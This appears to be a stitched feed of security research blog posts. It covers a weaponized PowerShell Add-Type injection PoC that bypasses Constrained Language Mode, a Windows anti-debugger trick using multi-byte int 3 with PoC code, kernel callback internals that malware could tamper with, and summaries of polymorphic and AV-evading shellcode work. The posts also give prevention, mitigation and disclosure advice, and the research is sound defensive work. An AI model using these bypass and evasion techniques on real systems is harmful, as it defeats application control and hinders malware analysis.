    • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that were to occur, most system files would, for all intents and purposes, cease to be signed.
    • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
    • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
    • What if there is data appended beyond the digital signature? This has been abused in the past.
    • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value, i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample and got more than one hit on a single Authentihash in VirusTotal, I would find that very interesting.

    Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode

    29 August 2017 at 12:32

    Introduction


    Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. Its most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode, because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attacker’s ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode, and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

    ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
      Select-String -Pattern 'Add-Type' |
      Sort Path -Unique |
      % { Get-AuthenticodeSignature -FilePath $_.Path } |
      ? { $_.SignerCertificate.Subject -match 'Microsoft' }


    Exploitation


    Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

    $Global:Source = @'
    public class Test {
        public static string PrintString(string inputString) {
            return inputString;
        }
    }
    '@

    Add-Type -TypeDefinition $Global:Source


    Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

    Alright, let’s think the process through together:
    1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
    2. The issue though is that the signed code defines the global variable immediately prior to calling Add-Type, so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
    3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

    Weaponization


    Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, preventing the signed code from overwriting the global “Source” variable. Here’s a weaponized proof of concept:

    Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
    public class Injected {
        public static string ToString(string inputString) {
            return inputString;
        }
    }
    '@

    Import-Module VulnModule

    [Injected]::ToString('Injected!!!')


    A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

    So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

    Prevention


    The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single-quoted strings will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell, watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

    Mitigation


    While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

    A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule, which blocks execution based on the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file - so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… but what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of a script, you must know the hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts, collect the hashes, and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

    Another way a defender might get lucky blocking vulnerable PowerShell scripts is that most scripts and binaries on the system are catalog signed rather than Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So as Microsoft ships updates, hashes for old versions will eventually fall out of the catalog store and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though, and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature, as indicated by the presence of the following string: “SIG # Begin signature block”. Such bypass scripts exist. Just ask Matt Nelson.

    Reporting


    If you find a bypass, report it to [email protected] and earn yourself a CVE. The PowerShell team actively addresses injection flaws, but they are also taking proactive steps to mitigate many of the primitives used to influence code execution in these classes of bugs.

    Conclusion


    While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and its library of signed modules/scripts remain a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you’ll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

    Now, everything that I just explained is great, but it turns out that any call to Add-Type remains vulnerable to injection due to a design issue that permits exploiting a race condition. I really hope that, by continuing to shed light on these issues, Microsoft will consider addressing this fundamental issue.

    Detecting debuggers by abusing a bad assumption within Windows

    By: Nemi
    1 September 2017 at 21:03
    This blog post will go over an assumption made over a decade ago by Microsoft when dealing with software breakpoints that can be used to reveal the presence of most (all publicly available?) usermode and kernelmode debuggers.

    The x86 architecture can potentially encode a particular assembly instruction in multiple ways. For example, adding two registers, eax and ebx, and storing the result in eax takes the following mnemonic form: add eax, ebx. This can be encoded as the byte sequence 0x03 0xC3 or 0x01 0xD8. Fundamentally, the machine code represents the same assembly operation.

    If you're just interested in the anti-debug trick (without any context on why it works the way it does), scroll to the bottom of this post. For the rest of you brave enough to read this article in its entirety... buckle up. 

    The "long form" of int 3

    An int 3 can be encoded either as the single byte 0xCC or, more unconventionally, as the multi-byte sequence 0xCD 0x03:

    From the Intel Instruction Set Reference (Volume 2, Chapter 3, Section 3.2).

    So, what happens when Windows encounters a multi-byte int 3? We create a simple C++ program to find out:
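
    The following is my own minimal reconstruction of such a program (not the original; compile as x64 with MSVC, since it relies on SEH and the x64 CONTEXT):

    #include <windows.h>
    #include <cstdio>
    #include <cstring>

    // Report what Windows claims about the breakpoint, then unwind.
    static int Report(const char* label, PEXCEPTION_POINTERS x) {
        printf("%s: ExceptionAddress=%p, Rip=%p\n", label,
               x->ExceptionRecord->ExceptionAddress, (void*)x->ContextRecord->Rip);
        return EXCEPTION_EXECUTE_HANDLER;
    }

    int main() {
        // 0xCC = single-byte int 3; 0xCD 0x03 = multi-byte int 3; 0xC3 = ret.
        BYTE code[] = { 0xCC, 0xC3, 0xCD, 0x03, 0xC3 };
        BYTE* stub = (BYTE*)VirtualAlloc(nullptr, sizeof(code),
                                         MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(stub, code, sizeof(code));
        printf("Stub allocated at %p\n", (void*)stub);

        __try { ((void(*)())stub)(); }        // single-byte form at stub+0
        __except (Report("0xCC", GetExceptionInformation())) {}

        __try { ((void(*)())(stub + 2))(); }  // multi-byte form at stub+2
        __except (Report("0xCD 0x03", GetExceptionInformation())) {}
        return 0;
    }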

    After you run this application, you should see output similar to this:


    A single-byte int 3 (0xCC) works as expected. The start of the stub is located at 0x000001BE94B90000. When the stub is executed, the exception handler fires and we see that both the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip are located at 0x000001BE94B90000. This is the start of the int 3 instruction. Excellent!

    The multi-byte int 3 (0xCD 0x03) is located at address 0x000001BE94B90002. When this stub executes, the exception handler proclaims that the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip are located at 0x000001BE94B90003. This is in the middle of the int 3 instruction. Why? What went wrong?

    The assumption

    NOTE: From this point on, all disassembly and pseudo-source is reconstructed from system files that are provided with Windows x64 10.0.15063 (Creator's Update). If you'd like to follow along, make sure you use the same version I'm using!

    Microsoft assumes that all int 3's result from the single-byte variant.

    This assumption occurs very early during interrupt processing. Namely, when any interrupt occurs, such as when an int 3 is executed by the processor, control is redirected by the CPU to a handler registered in the appropriate position of the IDT (Interrupt Descriptor Table). In Windows, the handler for software breakpoints can be found at the symbol nt!KiBreakpointTrap:

    The first thing nt!KiBreakpointTrap does is generate a trap frame (_KTRAP_FRAME) on the stack that it passes to subsequent routines. A definition of this structure can be found below:
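
    Only the portion relevant here is reproduced (offsets as I recall them from the 10.0.15063 symbols; the full structure is much larger):

    // Tail of the x64 _KTRAP_FRAME - the part the CPU fills on interrupt entry:
    //   +0x160 ErrorCode : UINT64
    //   +0x168 Rip       : UINT64
    //   +0x170 SegCs     : UINT16
    //   +0x178 EFlags    : UINT32
    //   +0x180 Rsp       : UINT64
    //   +0x188 SegSs     : UINT16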

    Parts of this structure are automatically filled by the CPU when the interrupt fires, in particular, the range from +0x160 (_KTRAP_FRAME.ErrorCode) to +0x188 (_KTRAP_FRAME.SegSs):

    From the Intel Instruction Set Reference (Volume 3, Chapter 6, Section 6.12).

    The _KTRAP_FRAME is essentially an extension of the elements saved on the stack by the CPU. Its purpose is to provide a place to store volatile registers which can be clobbered when calling into functions that are compiled in C.

    A very important thing to note is that the instruction pointer (RIP) saved by the CPU on the stack (_KTRAP_FRAME.Rip) will be set to the instruction immediately following the one that caused entry into the handler. In our scenario, this means that the _KTRAP_FRAME.Rip member will be the instruction following our int 3, which is the ret (0xC3) in the example code above.

    After the volatile registers have been saved off, nt!KiBreakpointTrap performs a quick check to see whether the interrupt fired from usermode (ring3) or kernelmode code (ring0). If execution is coming from ring3, a swapgs needs to occur as well as some other bookkeeping with debug registers.

    Eventually, control flow will reconvene and the volatile floating point registers will also be stored off into the _KTRAP_FRAME. Before entering into more exception handling logic, the instruction pointer will be extracted from _KTRAP_FRAME.Rip (saved by the CPU upon entering nt!KiBreakpointTrap), decremented by one, and passed as an argument to nt!KiExceptionDispatch. Additionally, the exception code, EXCEPTION_BREAKPOINT (0x80000003), will also be passed in. The prototype for nt!KiExceptionDispatch:

    It's important to note that nt!KiExceptionDispatch (like nt!KiBreakpointTrap) is written in hand-ASM. It assumes that ecx contains the exception code, edx is the number of exception parameters (up to 3), r8 contains the address of the exception, r9 is the first exception parameter (if one exists), r10 is the second exception parameter (if one exists), r11 is the third exception parameter (if one exists), and rbp points to a segment in the _KTRAP_FRAME structure (at offset +0x80).

    Upon entry of nt!KiExceptionDispatch, the first thing that occurs is the generation of a _KEXCEPTION_FRAME. Whereas the _KTRAP_FRAME was used to store volatile registers, the _KEXCEPTION_FRAME provides a place to save all nonvolatile registers:

    nt!KiExceptionDispatch also creates an _EXCEPTION_RECORD structure on the stack. If you've done any error handling in Windows (in either usermode or kernelmode), you'll be familiar with this data structure as it is contained as a child within the _EXCEPTION_POINTERS data structure. We use both of these structures in our example above.

    Furthermore, this explains the first part of our mystery, namely, why the _EXCEPTION_RECORD.ExceptionAddress is incorrect. Recall that _EXCEPTION_RECORD.ExceptionAddress is populated from the 3rd (r8) argument to nt!KiExceptionDispatch, passed in from nt!KiBreakpointTrap. This argument is a copy of the _KTRAP_FRAME.Rip member decremented by one.

    To figure out where the _CONTEXT.Rip member is populated, we need to go deeper down the rabbit hole.

    nt!KiExceptionDispatch will call into nt!KiDispatchException (yes, the ordering of the words is intentionally flipped) passing in the recently created _EXCEPTION_RECORD and _KEXCEPTION_FRAME:

    This function will build a _CONTEXT out of the _KTRAP_FRAME and _KEXCEPTION_FRAME by invoking the helper routine nt!KeContextFromKframes. After the _CONTEXT is created, a check is made against the _EXCEPTION_RECORD.ExceptionCode (received as an argument from nt!KiExceptionDispatch) for STATUS_BREAKPOINT (0x80000003). If it matches, the _CONTEXT.Rip member is decremented:
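
    In pseudo-code, the check looks roughly like this (my reconstruction, not the literal disassembly):

    if (ExceptionRecord->ExceptionCode == STATUS_BREAKPOINT) {
        ContextRecord->Rip--;   // assumes the single-byte 0xCC encoding
    }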

    This solves the last part of the mystery and causes the value in _CONTEXT.Rip to be tainted.

    The anti-debug trick

    Knowing what we know about how Windows handles the different types of int 3s, is it possible to leverage this discrepancy in a useful way? The answer is yes. 

    Debuggers display the state of the program at the time of an exception. Since Windows will incorrectly assume that our int 3 exception was generated from the single-byte variant, it is possible to confuse the debugger into reading "extra" memory. We leverage this inconsistency to trip a "guard page" of sorts. 


    As we saw in our first example (at the start of the article), when a multi-byte int 3 occurs, the _EXCEPTION_RECORD.ExceptionAddress and _CONTEXT.Rip values will lie in the middle of our multi-byte instruction instead of at the start. This means that the debugger will incorrectly determine that the instruction which threw the software breakpoint begins with the opcode 0x03. Referring to the trusty Intel manual, we can see that this opcode represents a 2-byte add instruction:

    From the Intel Instruction Set Reference (Volume 2, Chapter 3, Section 3.2).

    What would happen if we positioned our multi-byte int 3 near the end of a page of memory?

    When the operating system notifies our attached debugger of the breakpoint exception, the instruction pointer will point to memory that will be misinterpreted as the start of an add (0x03) instruction. This will cause the debugger to disassemble data on the adjacent page (since this instruction is 2 bytes long), and effectively read one byte past our "valid" memory range.

    Our trick relies on the fact that Windows, as an optimization, will not commit virtual memory to physical RAM unless it absolutely needs it. That is to say that most memory, especially in usermode, is paged. When memory needs to be made available for use that is not currently in physical RAM, a page fault occurs. To learn more about memory management, check out the following articles on our site: Introduction to IA-32e hardware paging and Exploring Windows virtual memory management.

    So, we can detect the memory read on this adjacent page by inspecting the corresponding PTE (Page Table Entry) using the QueryWorkingSetEx API. If the page is resident in our process' working set (e.g. because a debugger just read it in order to disassemble), the Valid bit in the _PSAPI_WORKING_SET_EX_BLOCK will be set.

    PoC||GTFO

    A full example can be found below:
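
    The following is my own minimal reconstruction of the idea rather than the original PoC (compile as x64 with MSVC):

    #include <windows.h>
    #include <psapi.h>   // QueryWorkingSetEx, PSAPI_WORKING_SET_EX_INFORMATION
    #include <cstdio>

    int main() {
        SYSTEM_INFO si;
        GetSystemInfo(&si);
        const SIZE_T page = si.dwPageSize;

        // Two adjacent committed pages; our code never touches the second one.
        BYTE* base = (BYTE*)VirtualAlloc(nullptr, 2 * page,
                                         MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        BYTE* stub = base + page - 2;
        stub[0] = 0xCD;   // the multi-byte int 3 occupies the last
        stub[1] = 0x03;   // two bytes of the first page

        __try {
            ((void(*)())stub)();   // reported RIP = stub + 1 (the 0x03 byte)
        } __except (EXCEPTION_EXECUTE_HANDLER) {
            // Swallow the breakpoint. An attached debugger saw RIP at stub + 1,
            // disassembled a bogus 2-byte "add", and read into the next page.
        }

        PSAPI_WORKING_SET_EX_INFORMATION wsi = {};
        wsi.VirtualAddress = base + page;   // the page we never touched
        QueryWorkingSetEx(GetCurrentProcess(), &wsi, sizeof(wsi));

        // Bit 0 of the attributes is the Valid bit: set only if the page is resident.
        printf((wsi.VirtualAttributes.Flags & 1) ? "Debugger detected!\n"
                                                 : "No debugger.\n");
        return 0;
    }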

    As always, if you have any questions or comments, please feel free to send us a message below. Happy hacking 😎.

    Enumerating process, thread, and image load notification callback routines in Windows

    By: Nemi
    17 September 2017 at 23:46
    Most people are familiar with the fact that Windows contains a wide variety of kernel-mode callback routines that driver developers can opt into to receive various event notifications. This blog post will explain exactly how some of these function under the hood. In particular, we'll investigate how the process creation and termination callbacks (nt!PsSetCreateProcessNotifyRoutine, nt!PsSetCreateProcessNotifyRoutineEx, and nt!PsSetCreateProcessNotifyRoutineEx2), thread creation and termination callbacks (nt!PsSetCreateThreadNotifyRoutine and nt!PsSetCreateThreadNotifyRoutineEx), and image load notification callbacks (nt!PsSetLoadImageNotifyRoutine) work internally. Furthermore, we'll release a handy WinDbg script that will let you enumerate these different types of callbacks.

    If you'd like to follow along, I'll be using system files from Windows x64 10.0.15063 (Creator's Update). All pseudo-source and disassembly is reconstructed from that specific release.

    Don't have a kernel debugging environment set up? Don't fret. You can follow our tutorial on how to setup basic kernel debugging using WinDbg and VMware here.

    Without further ado, let's begin.

    What do these callbacks do?

    These callbacks can be used by driver developers to gain notifications when certain events happen. For example, the basic process creation callback, nt!PsSetCreateProcessNotifyRoutine, registers a user-defined function pointer ("NotifyRoutine") that will be invoked by Windows each time a process is created or deleted. As part of the event notification, the supplied handler gets a wealth of information. In our example, this will include the parent process' PID (if one exists), the actual process' PID, and a boolean value indicating whether the process is being created or is terminating.
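
    To ground that, here is a minimal sketch of a driver that registers (and unregisters) such a callback - my own illustration, assuming a WDK build environment:

    #include <ntddk.h>

    // Invoked by the kernel on every process creation and termination.
    VOID ProcessNotify(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create) {
        DbgPrint("Process %p %s (parent: %p)\n",
                 ProcessId, Create ? "created" : "exited", ParentId);
    }

    VOID DriverUnload(PDRIVER_OBJECT DriverObject) {
        UNREFERENCED_PARAMETER(DriverObject);
        PsSetCreateProcessNotifyRoutine(ProcessNotify, TRUE);   // TRUE = remove
    }

    extern "C" NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
        UNREFERENCED_PARAMETER(RegistryPath);
        DriverObject->DriverUnload = DriverUnload;
        return PsSetCreateProcessNotifyRoutine(ProcessNotify, FALSE);   // FALSE = register
    }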

    Security software leverages these callbacks to be able to carefully inspect code running on the machine. 

    Divin' deep

    The documented APIs

    Our investigation has to begin somewhere. What better place than at the start of a documented function? We turn to nt!PsSetCreateProcessNotifyRoutine. MSDN claims that this routine has been around since Windows 2000. Even our friends at ReactOS seem to have implemented this functionality a long time ago. We'll see exactly how (if at all) things have changed in the 17 years from Windows 2000 until now.

    This function just seems to call an implementer routine, nt!PspSetCreateProcessNotifyRoutine. In fact, this same routine is invoked for the other variations, nt!PsSetCreateProcessNotifyRoutineEx and nt!PsSetCreateProcessNotifyRoutineEx2:


    The only difference is in the second parameter being passed to nt!PspSetCreateProcessNotifyRoutine. These are effectively flags. In the base case (nt!PsSetCreateProcessNotifyRoutine), these flags can either be 1 or 0 depending on the state of the "Remove" parameter. If "Remove" is TRUE, Flags=1. If "Remove" is FALSE, Flags=0. In the extended case (nt!PsSetCreateProcessNotifyRoutineEx), the flags can take on the value 2 or 3:

    Finally, for nt!PsSetCreateProcessNotifyRoutineEx2, these flags will take on the value 6 or 7:

    Therefore, one can imply that the flags passed to nt!PspSetCreateProcessNotifyRoutine have this definition:
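
    In other words (the names below are my own; only the values are implied by the call sites above):

    #define PSP_NOTIFY_REMOVE   0x1   // the "Remove" parameter was TRUE
    #define PSP_NOTIFY_EX       0x2   // registered via an extended (Ex/Ex2) variant
    #define PSP_NOTIFY_EX2      0x4   // registered via the Ex2 variant (always combined with 0x2)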


    The undocumented world

    nt!PspSetCreateProcessNotifyRoutine is slightly complicated. I've defined it below, but I strongly recommend opening it in another window and following the text to ease understanding.

    Luckily for us, a lot of the internal data structures related to callback routines haven't changed since Windows 2000. The trailblazers at ReactOS have been spot-on with their structure definitions so we'll use them, when possible, to avoid duplicating work.

    For each callback, there's a global array that can contain up to 64 entries. In our case, the start of this array for process creation callbacks is located at nt!PspCreateProcessNotifyRoutine. Each entry in this array is of type _EX_CALLBACK:
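
    Per ReactOS, the definition is tiny - each slot is just a fast-referenced pointer (layout from the ReactOS headers, lightly reformatted):

    typedef struct _EX_FAST_REF {
        union {
            PVOID     Object;
            ULONG_PTR RefCnt : 4;   // 3 bits on x86
            ULONG_PTR Value;
        };
    } EX_FAST_REF, *PEX_FAST_REF;

    typedef struct _EX_CALLBACK {
        EX_FAST_REF RoutineBlock;
    } EX_CALLBACK, *PEX_CALLBACK;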

    To avoid synchronization problems, nt!ExReferenceCallBackBlock is used which will safely acquire a reference to the underlying callback object, _EX_CALLBACK_ROUTINE_BLOCK (documented below). We can effectively reproduce the same behavior in a non-thread safe way via:
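
    Roughly, in a non-thread-safe sketch (my own; the EX_FAST_REF stashes an inline reference count in the low pointer bits):

    // Non-thread-safe equivalent of nt!ExReferenceCallBackBlock (sketch only).
    // Masking off the low 4 bits (x64) recovers the block pointer.
    PEX_CALLBACK_ROUTINE_BLOCK Block = (PEX_CALLBACK_ROUTINE_BLOCK)
        (CallBack->RoutineBlock.Value & ~0xFULL);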

    If we're deleting a callback object ("Remove" is TRUE), we need to make sure that we can find the appropriate _EX_CALLBACK_ROUTINE_BLOCK in the array. This is done by checking first if the target "NotifyRoutine" matches that of the current _EX_CALLBACK_ROUTINE with nt!ExGetCallBackBlockRoutine:

    Then, we check to see if it’s the right type (created with the correct version of nt!PsSetCreateProcessNotifyRoutine/Ex/Ex2) by using nt!ExGetCallBackBlockContext:

    At this point, we've found the entry in the array. We will erase it by setting the _EX_CALLBACK value to NULL via nt!ExCompareExchangeCallback, decrementing the appropriate global counter (nt!PspCreateProcessNotifyRoutineExCount or nt!PspCreateProcessNotifyRoutineCount), dereferencing the _EX_CALLBACK_ROUTINE_BLOCK with nt!ExDereferenceCallBackBlock, waiting for any other code using the _EX_CALLBACK (nt!ExWaitForCallBacks), and finally freeing memory (nt!ExFreePoolWithTag). As you can see, great care is taken by Microsoft to not free a callback object that is in use.

    If we can't find the entry to remove in the nt!PspCreateProcessNotifyRoutine array after exhausting all 64 possibilities, the STATUS_PROCEDURE_NOT_FOUND error message is returned.

    On the other hand, if we’re adding a new entry into the callback array, things are a little easier. A sanity check is performed by nt!MmVerifyCallbackFunctionCheckFlags to ensure that the "NotifyRoutine" is present in a loaded module. This helps prevent unlinked drivers (or shellcode) from receiving callback events:

    After we pass the sanity check, an _EX_CALLBACK_ROUTINE_BLOCK is allocated via nt!ExAllocateCallBack. This routine confirms the size and layout of the _EX_CALLBACK_ROUTINE_BLOCK structure:
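
    Based on the ReactOS definitions, the block looks like this (field comments are mine):

    typedef struct _EX_CALLBACK_ROUTINE_BLOCK {
        EX_RUNDOWN_REF        RundownProtect;   // guards against use-after-free
        PEX_CALLBACK_FUNCTION Function;         // the registered NotifyRoutine
        PVOID                 Context;          // the flags value described earlier
    } EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;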

    To wrap up, the newly allocated _EX_CALLBACK_ROUTINE_BLOCK is added to a free (NULL) location in the nt!PspCreateProcessNotifyRoutine array using nt!ExCompareExchangeCallBack (ensuring that it doesn’t overflow the 64-entry maximum). Finally, the appropriate global counter is incremented, and a global flag is set in nt!PspNotifyEnableMask denoting that there are callbacks of the user-specified type registered on the system.

    The other callbacks

    Thankfully, thread and image creation callbacks are very similar to process callbacks. They utilize the same underlying data structures. The only difference is that thread creation/termination callbacks are stored in the nt!PspCreateThreadNotifyRoutine array and that image load notification callbacks are stored in nt!PspLoadImageNotifyRoutine.

    The script

    It's finally time to put what we know to good use. Using WinDbg, we can create a simple script to automagically enumerate process, thread, and image callback routines.

    Instead of leveraging WinDbg's built-in scripting engine, I've elected to use something a little less disgusting. There's a great 3rd party extension for WinDbg called PyKd that enables Python scripting in WinDbg. Installing it is very straightforward. You'll need a copy of Python of the appropriate bitness (e.g. 64-bit Python for a 64-bit install of WinDbg) for this to work.

    The script should be easy to follow. I tried to document it as best I could. It should also be compatible, at a minimum, with all forms of Windows from XP and up (both 32-bit and 64-bit flavors).

    After running the script using the "!py" command, you should see output similar to this:


    Final thoughts

    Knowing how the callback system functions in Windows allows us to do very interesting things. As seen above, we're able to programmatically iterate through each callback array and discover all registered callbacks. This is very useful for forensic purposes.

    Furthermore, these underlying array lists aren't under the protection of PatchGuard. Since registering callbacks is more-or-less a requirement for anti-virus products in order to develop a useful driver that plays nicely with PatchGuard on x64 systems, malware could dynamically disable (or replace) these registered callbacks to thwart security protection solutions. The possibilities are endless.

    Special thanks to the folks at ReactOS for their meticulous documentation. In particular, most of the structures I used were identified by Alex Ionescu for ReactOS a long time ago. Additionally, kudos to the folks that make PyKd. It's a much better alternative to the native scripting interface for WinDbg, in my opinion!

    As always, if y'all have any questions or comments, please feel free to comment below. Suggestions are greatly appreciated too! 

    SLAE32 - Assignment 6 - Polymorphic Shellcodes

    6 October 2017 at 00:00
    As a sixth assignment of the 32-bit Securitytube Linux Assembly Expert, I had to create three different polymorphic versions of shellcodes taken from ShellStorm. Here is my selection: Linux x86 execve(“/bin/sh”) - 28 bytes. Linux x86 iptables flush - 43 bytes. Linux x86 ASLR deactivation - 83 bytes. Polymorphism means that we can mutate shellcode so that, while keeping the same functionality, its signature is different.

    SLAE32 - Assignment 7 - Custom Crypter

    10 October 2017 at 00:00
    As a seventh and last assignment of the 32-bit Securitytube Linux Assembly Expert, I have been tasked with creating a custom shellcode crypter. The idea behind a crypter is to encode the shellcode beforehand and decode it at runtime. This process makes the shellcode look like random data, with the aim of bypassing AV and IDS detection. When it comes to cryptography, it is a well-known, wise approach not to try to reinvent the wheel and instead use what is available and well tested: this prevents any new weakness or bug from being introduced in a freshly written crypto algorithm.